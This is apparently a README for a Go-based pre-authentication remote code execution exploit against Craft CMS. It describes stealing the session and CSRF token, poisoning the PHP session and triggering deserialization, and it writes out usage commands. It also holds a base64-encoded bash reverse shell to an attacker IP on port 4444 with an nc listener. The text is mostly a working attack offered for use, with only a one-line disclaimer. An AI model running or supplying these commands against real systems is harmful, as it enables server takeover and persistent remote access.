
Go로 작성된 Craft CMS용 사전 인증 RCE 익스플로잇입니다. 세션/CSRF 토큰을 획득하고, PHP 세션을 오염시킨 후, 역직렬화를 트리거하여 명령 실행 또는 리버스 셸을 수행합니다.
Craft CMS에서 인증 없이 원격 코드 실행을 수행하는 Go 기반 익스플로잇입니다.
c0gnit00의 원본 작업에서 영감을 받았습니다.
GET /admin/login을 통해 PHP 세션과 CSRF 토큰을 획득합니다.assets/generate-transform을 통해 역직렬화를 트리거하여 오염된 파일을 포함하고 실행합니다.go run main.go -u <url> -c <comando>
| Flag | 설명 | 필수 |
|---|---|---|
-u | 대상 URL (예: http://target.com) | 예 |
-c | 실행할 명령어 (예: id, whoami) | 예 |
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami
1. IP와 포트를 사용하여 base64 페이로드를 생성합니다:
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
2. 리스너를 엽니다:
nc -lvnp 4444
3. 페이로드로 익스플로잇을 실행합니다:
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
base64 값은 1단계에서 실제 IP로 생성한 값으로 바꾸십시오.
승인된 환경 및 통제된 보안 테스트에서만 사용하십시오.